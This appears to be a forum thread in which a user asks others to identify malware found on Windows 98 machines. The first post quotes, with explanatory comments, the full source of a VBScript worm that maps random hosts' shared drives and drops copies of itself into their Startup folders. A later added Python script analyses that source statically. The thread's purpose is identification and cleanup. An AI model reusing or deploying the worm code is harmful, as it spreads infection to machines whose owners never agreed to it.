
Can Anybody Identify These Viruses/Worms/Trojans?

I found these on one of my computers when I was having trouble with my home network (all WIN98 machines):

1. A .exe 160KB file in the Windows\System directory that was executing on boot-up, under the title "Microsoft Diagnostic" in MSCONFIG. The file renames itself when you execute it (i.e. IVQK.exe to ACJKVA.exe), and places itself in the Windows\System directory. The file disables Zonealarm, and who knows what else. I don't know much about the programming language of this bastard, but viewing it in Wordpad it may be C++. One other thing about this file is that I remember getting an error message when shutting it down concerning "ACEBOTMAINTHREAD". Could this be a Quake II bot?

2. A more interesting file was found in the "STARTUP" directory. The file was "_.vbs" and contained a definite worm. Cut/Pasted below:

set t=wscript.createobject("wscript.network")
set f=createobject("scripting.filesystemobject")
on error resume next    ' swallow every failure (missing files, failed drive mappings) and keep going
randomize
do
    ' w is never initialised; an empty VBScript variant compares equal to 0, so this
    ' inner loop runs until one remote share has been mapped successfully
    do while w=0
        ' housekeeping: remove earlier droppers and rival worm variants from the local Startup folder
        if (f.fileexists("c:\windows\startm~1\programs\startup\network.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\network.vbs")
        if (f.fileexists("c:\windows\startm~1\programs\startup\network.exe")) then f.deletefile("c:\windows\startm~1\programs\startup\network.exe")
        if (f.fileexists("c:\windows\startm~1\programs\startup\mscfg.exe")) then f.deletefile("c:\windows\startm~1\programs\startup\mscfg.exe")
        if (f.fileexists("c:\windows\startm~1\programs\startup\mscfg.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\mscfg.vbs")
        if (f.fileexists("c:\windows\startm~1\programs\startup\a.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\a.vbs")
        if (f.fileexists("c:\windows\startm~1\programs\startup\a24.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\a24.vbs")
        if (f.fileexists("c:\windows\startm~1\programs\startup\little.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\little.vbs")
        if (f.fileexists("c:\windows\startm~1\programs\startup\prince.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\prince.vbs")
        if (f.fileexists("c:\windows\startm~1\programs\startup\MS StartUp Config.exe")) then f.deletefile("c:\windows\startm~1\programs\startup\MS StartUp Config.exe")
        if (f.fileexists("c:\windows\startm~1\programs\startup\_a.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\_a.vbs")
        if (f.fileexists("c:\windows\startm~1\programs\startup\_b.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\_b.vbs")

        ' pick a random host in 216.0.0.0/8 (int(254*rnd+1) gives 1..254 per octet)
        ' and try to map its share named "C" as drive X:
        n="\\216."&int(254*rnd+1)&"."&int(254*rnd+1)&"."&int(254*rnd+1)&"\C"
        t.mapnetworkdrive "x:",n
        ' a failed mapnetworkdrive is hidden by "on error resume next"; the only success
        ' signal is that the UNC path now appears in the list of mapped drives
        set o=t.enumnetworkdrives
        for i=0 to o.Count-1
            if n=o.item(i) then w=1
        next
    loop
    ' drop the script and its .exe companion into the victim's Startup folder,
    ' so both run at the victim's next boot; then unmap and start over
    f.copyfile "c:\windows\startm~1\programs\startup\_.vbs", "x:\windows\startm~1\programs\startup\"
    f.copyfile "c:\windows\startm~1\programs\startup\_.exe", "x:\windows\startm~1\programs\startup\"
    t.removenetworkdrive "x:"
    w=0
loop
'Viva Bin Laden!



Norton Antivirus didn't pick up on either one of these. What in the world is going on? Should I reformat the drive?

If anybody wants to see the former file I can e-mail for examination.

TIA


<< n="\\216."&int(254*rnd+1)&"."&int(254*rnd+1)&"."&int(254*rnd+1)&"\C" >>



I'm no scripter, but this line looks like it tries random IPs, with the first octet always 216.
It looks like it shares out all your drives as well?

It's definitely a worm of some sort.
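The posted _.vbs and the reply's reading of the 216 line can both be checked without ever running the script. The Python below is an added example, not code from either post: it reads a copy of the worm as text and extracts its indicators (the Startup-folder names it deletes, the files it drops, the address space it scans and the share name it expects), then matches those names against a directory listing. The embedded sample is the propagation core of the posted script with the run of cleanup lines trimmed; the regexes, the function names and the directory listing are constructed for this example.

```python
"""Static triage of the Startup-folder worm script quoted in this thread.

Added example (not code from the original posts): it pulls the indicators out
of the VBScript *text* without executing it, so it is safe to run on a captured
sample. The helper names below are this example's own, not a vendor tool's.
"""
import random
import re
from math import prod

# Constructed sample: the propagation core of "_.vbs" as posted above, with the
# run of rival-cleanup lines trimmed to three. The logic is unchanged.
SAMPLE_VBS = r'''
set t=wscript.createobject("wscript.network")
set f=createobject("scripting.filesystemobject")
on error resume next
randomize
do
do while w=0
if (f.fileexists("c:\windows\startm~1\programs\startup\network.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\network.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\mscfg.exe")) then f.deletefile("c:\windows\startm~1\programs\startup\mscfg.exe")
if (f.fileexists("c:\windows\startm~1\programs\startup\a.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\a.vbs")
n="\\216."&int(254*rnd+1)&"."&int(254*rnd+1)&"."&int(254*rnd+1)&"\C"
t.mapnetworkdrive "x:",n
set o=t.enumnetworkdrives
for i=0 to o.Count-1
if n=o.item(i) then w=1
next
loop
f.copyfile "c:\windows\startm~1\programs\startup\_.vbs", "x:\windows\startm~1\programs\startup\"
f.copyfile "c:\windows\startm~1\programs\startup\_.exe", "x:\windows\startm~1\programs\startup\"
t.removenetworkdrive "x:"
w=0
loop
'''

# A double-quoted Windows path, capturing only its final file-name component.
_QUOTED_PATH = r'"[^"]*\\([^"\\]+)"'


def deleted_startup_files(vbs):
    """File names the script deletes from the Startup folder (old droppers, rival variants)."""
    return re.findall(r'deletefile\(' + _QUOTED_PATH + r'\)', vbs, flags=re.I)


def copied_files(vbs):
    """(file name, destination drive letter) for every copyfile call."""
    return re.findall(r'copyfile\s+' + _QUOTED_PATH + r',\s*"([a-z]):', vbs, flags=re.I)


def target_address_space(vbs):
    """Decode the UNC path builder: literal leading octets, random octet ranges, share name."""
    line = next(l for l in vbs.splitlines() if l.strip().startswith("n="))
    prefix = re.search(r'"\\\\((?:\d+\.)+)"', line).group(1).rstrip(".")
    # int(N*rnd+1) with rnd in [0,1) yields 1..N, so .0 and .255 are never generated
    ranges = [(1, int(n)) for n in re.findall(r'int\((\d+)\*rnd\+1\)', line)]
    share = re.search(r'&"\\([^"\\]+)"\s*$', line).group(1)
    return {
        "prefix": prefix,
        "random_octets": ranges,
        "share": share,
        "host_count": prod(hi - lo + 1 for lo, hi in ranges),
    }


def pick_target(space, seed=None):
    """Reproduce the worm's target selection; a seed makes the choice repeatable for testing."""
    rng = random.Random(seed)
    octets = [str(int(hi * rng.random() + lo)) for lo, hi in space["random_octets"]]
    return "\\\\" + ".".join([space["prefix"], *octets]) + "\\" + space["share"]


def startup_indicators(vbs):
    """Lower-cased names of every Startup-folder file the script drops or deletes."""
    names = set(deleted_startup_files(vbs)) | {src for src, _ in copied_files(vbs)}
    return {n.lower() for n in names}


def scan_startup_listing(listing, vbs):
    """Entries of a Startup-folder directory listing that match the script's indicators."""
    iocs = startup_indicators(vbs)
    return sorted(name for name in listing if name.lower() in iocs)


if __name__ == "__main__":
    space = target_address_space(SAMPLE_VBS)
    print("deletes:", deleted_startup_files(SAMPLE_VBS))
    print("drops:", copied_files(SAMPLE_VBS))
    print("scans: %s.x.x.x share %r, %d candidate hosts"
          % (space["prefix"], space["share"], space["host_count"]))
    print("sample target:", pick_target(space, seed=1))
    # Constructed directory listing of an infected machine's Startup folder.
    listing = ["_.vbs", "_.exe", "Network.VBS", "Office Startup.lnk"]
    print("hits:", scan_startup_listing(listing, SAMPLE_VBS))
```

Two things the extraction makes concrete: the scan space is exactly 216.1-254.1-254.1-254 (16,387,064 candidates, none ending in .0 or .255), and the only thing the script ever writes to a remote host is two files in its Startup folder, via a share literally named "C". Nothing in the script creates a share on the local machine. The names returned by startup_indicators are what to look for in the Startup folder of every other machine on the LAN, since an infected box will have been hammering random 216.x.x.x addresses rather than its neighbours, but any box that received the drop will run _.exe at next boot.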
 
Check out this web site; it has a pretty good description of your worm/trojan:

link to trojan identification

This is about as close as you will find to your description. It doesn't look very destructive though. This site will also run a free scan on your box to help clean it up.
